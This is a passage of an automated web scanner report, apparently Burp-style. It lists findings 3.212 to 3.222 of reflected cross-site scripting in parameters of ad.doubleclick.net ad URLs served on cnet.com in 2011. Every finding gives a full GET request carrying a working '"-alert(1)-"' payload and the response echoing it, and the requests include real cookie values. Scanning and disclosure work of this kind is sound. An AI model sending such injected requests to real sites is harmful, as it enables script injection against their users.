Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4608



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
3Dv8/3af6/17/153/%2a/m%3B240360897%3B0-0%3B0%3B63094144%3B3454-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000cfb97"-alert(1)-"232cf4defa8&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27
...[SNIP]...

3.212. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [ra parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.5

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abc4e"-alert(1)-"95e5ea569c was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243abc4e"-alert(1)-"95e5ea569c&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4605



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243abc4e"-alert(1)-"95e5ea569c&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http://www.hp.com/united-states/campaigns/elite-products/index.html?jumpid=ex_R2612_go/elite-products/dm:_N5823.CBSi_63094144_240360897_41852
...[SNIP]...

3.213. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [rqid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.5

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff21c"-alert(1)-"d3c6d27513c was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EEff21c"-alert(1)-"d3c6d27513c&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4606



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
4-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EEff21c"-alert(1)-"d3c6d27513c&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http://www.hp.com/united-states/campaigns/
...[SNIP]...

3.214. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [sg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.5

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9801"-alert(1)-"5173cd8ca68 was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121a9801"-alert(1)-"5173cd8ca68&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4608



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/153/%2a/m%3B240360897%3B0-0%3B0%3B63094144%3B3454-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121a9801"-alert(1)-"5173cd8ca68&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214
...[SNIP]...

3.215. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.5

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9e79"-alert(1)-"1aa564ccc88 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3b9e79"-alert(1)-"1aa564ccc88&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4608



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
ick%3Bh%3Dv8/3af6/17/153/%2a/m%3B240360897%3B0-0%3B0%3B63094144%3B3454-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3b9e79"-alert(1)-"1aa564ccc88&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=20
...[SNIP]...

3.216. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.5

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da3ab"-alert(1)-"c65b51b63f7 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736da3ab"-alert(1)-"c65b51b63f7&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4608



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...

var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/153/%2a/m%3B240360897%3B0-0%3B0%3B63094144%3B3454-728/90%3B41852066/41869853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10736da3ab"-alert(1)-"c65b51b63f7&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=1
...[SNIP]...

3.217. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [t parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.5

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13a37"-alert(1)-"d8785f269f4 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.5;sz=728x90;click0=http://adlog.com.com/adlog/e/r=10736&sg=511121&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.4113a37"-alert(1)-"d8785f269f4&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4607



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
=&cid=0&pp=100&e=3&rqid=00phx1-ad-e15:4DB87DC42925EE&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.4113a37"-alert(1)-"d8785f269f4&event=58/http://www.hp.com/united-states/campaigns/elite-products/index.html?jumpid=ex_R2612_go/elite-products/dm:_N5823.CBSi_63094144_240360897_41852066");
var wmode = "opaque";
var bg = "same as SWF
...[SNIP]...

3.218. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [b parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.6

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d39ad"-alert(1)-"704ff54a520 was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5d39ad"-alert(1)-"704ff54a520&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4622



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
leclick.net/click%3Bh%3Dv8/3af6/17/153/%2a/k%3B240279859%3B0-0%3B0%3B63094146%3B4307-300/250%3B41826606/41844393/2%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5d39ad"-alert(1)-"704ff54a520&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAAB
...[SNIP]...

3.219. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [cid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.6

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79382"-alert(1)-"be7bd050b4b was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=079382"-alert(1)-"be7bd050b4b&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4620



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
%2a/k%3B240279859%3B0-0%3B0%3B63094146%3B4307-300/250%3B41826606/41844393/2%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=079382"-alert(1)-"be7bd050b4b&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=
...[SNIP]...

3.220. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [count parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.6

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24379"-alert(1)-"3bf2868c0b9 was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=24379"-alert(1)-"3bf2868c0b9&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4621



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=&count=24379"-alert(1)-"3bf2868c0b9&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http://www.hp.com/united-states/campaigns/elite-products/index.html?jumpid=ex_R2612_go/elite-products/dm:_N5823.CBSi_63094
...[SNIP]...

3.221. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [cpnmodule parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.6

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64e68"-alert(1)-"39f92f3878c was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5823.CBSi/B5448927.6;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=64e68"-alert(1)-"39f92f3878c&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/;ord=2011.04.27.23.14.41? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/?tag=hdr;brandnav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4621



<SCRIPT LANGUAGE="JavaScript">
<!--
function DCF
...[SNIP]...
og/e/r=10737&sg=511146&o=1%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=2000&nd=1&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e18:4DB825B496F1C6&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=www.cnet.com&cpnmodule=64e68"-alert(1)-"39f92f3878c&count=&ra=173.193.214.243&pg=mvthWAoOYJUAABv9IaUAAAJ@&t=2011.04.27.23.14.41&event=58/http://www.hp.com/united-states/campaigns/elite-products/index.html?jumpid=ex_R2612_go/elite-products/dm:_N5823.CBS
...[SNIP]...

3.222. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [e parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.CBSi/B5448927.6

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e780b"-alert(1)-"3626fe1b7ba was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

